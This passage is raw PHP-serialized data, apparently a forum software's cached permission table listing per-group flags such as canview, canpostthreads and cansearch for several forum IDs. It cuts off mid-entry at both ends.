nlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"840\";s:3:\"fid\";s:2:\"84\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:21;a:18:{s:3:\"pid\";s:3:\"841\";s:3:\"fid\";s:2:\"84\";s:3:\"gid\";s:2:\"21\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}}i:61;a:13:{i:1;a:18:{s:3:\"pid\";s:3:\"501\";s:3:\"fid\";s:2:\"61\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:2;a:18:{s:3:\"pid\";s:3:\"502\";s:3:\"fid\";s:2:\"61\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:9;a:18:{s:3:\"pid\";s:3:\"506\";s:3:\"fid\";s:2:\"61\";s:3:\"gid\";s:1:\"9\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"1\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"0\";}i:5;a:18:{s:3:\"pid\";s:3:\"503\";s:3:\"fid\";s:2:\"61\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:6;a:18:{s:3:\"pid\";s:3:\"504\";s:3:\"fid\";s:2:\"61\";s:3:\"gid\";s:1:\"6\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"1\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:8;a:18:{s:3:\"pid\";s:3:\"505\";s:3:\"fid\";s:2:\"61\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:10;a:18:{s:3:\"pid\";s:3:\"507\";s:3:\"fid\";s:2:\"61\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:12;a:18:{s:3:\"pid\";s:3:\"508\";s:3:\"fid\";s:2:\"61\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"0\";}i:13;a:18:{s:3:\"pid\";s:3:\"509\";s:3:\"fid\";s:2:\"61\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"1\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"1\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:15;a:18:{s:3:\"pid\";s:3:\"510\";s:3:\"fid\";s:2:\"61\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:17;a:18:{s:3:\"pid\";s:3:\"511\";s:3:\"fid\";s:2:\"61\";s:3:\"gid\";s:2:\"17\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"662\";s:3:\"fid\";s:2:\"61\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:21;a:18:{s:3:\"pid\";s:3:\"778\";s:3:\"fid\";s:2:\"61\";s:3:\"gid\";s:2:\"21\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}}i:66;a:12:{i:1;a:18:{s:3:\"pid\";s:3:\"371\";s:3:\"fid\";s:2:\"66\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:2;a:18:{s:3:\"pid\";s:3:\"372\";s:3:\"fid\";s:2:\"66\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:9;a:18:{s:3:\"pid\";s:3:\"376\";s:3:\"fid\";s:2:\"66\";s:3:\"gid\";s:1:\"9\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"1\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:5;a:18:{s:3:\"pid\";s:3:\"373\";s:3:\"fid\";s:2:\"66\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:6;a:18:{s:3:\"pid\";s:3:\"374\";s:3:\"fid\";s:2:\"66\";s:3:\"gid\";s:1:\"6\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"1\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:8;a:18:{s:3:\"pid\";s:3:\"375\";s:3:\"fid\";s:2:\"66\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:10;a:18:{s:3:\"pid\";s:3:\"377\";s:3:\"fid\";s:2:\"66\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:12;a:18:{s:3:\"pid\";s:3:\"378\";s:3:\"fid\";s:2:\"66\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:13;a:18:{s:3:\"pid\";s:3:\"379\";s:3:\"fid\";s:2:\"66\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:15;a:18:{s:3:\"pid\";s:3:\"380\";s:3:\"fid\";s:2:\"66\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"665\";s:3:\"fid\";s:2:\"66\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:21;a:18:{s:3:\"pid\";s:3:\"780\";s:3:\"fid\";s:2:\"66\";s:3:\"gid\";s:2:\"21\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}}i:79;a:11:{i:1;a:18:{s:3:\"pid\";s:3:\"564\";s:3:\"fid\";s:2:\"79\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:2;a:18:{s:3:\"pid\";s:3:\"565\";s:3:\"fid\";s:2:\"79\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:9;a:18:{s:3:\"pid\";s:3:\"568\";s:3:\"fid\";s:2:\"79\";s:3:\"gid\";s:1:\"9\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"1\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:5;a:18:{s:3:\"pid\";s:3:\"566\";s:3:\"fid\";s:2:\"79\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:8;a:18:{s:3:\"pid\";s:3:\"567\";s:3:\"fid\";s:2:\"79\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:10;a:18:{s:3:\"pid\";s:3:\"569\";s:3:\"fid\";s:2:\"79\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:13;a:18:{s:3:\"pid\";s:3:\"570\";s:3:\"fid\";s:2:\"79\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:15;a:18:{s:3:\"pid\";s:3:\"571\";s:3:\"fid\";s:2:\"79\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:17;a:18:{s:3:\"pid\";s:3:\"572\";s:3:\"fid\";s:2:\"79\";s:3:\"gid\";s:2:\"17\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"6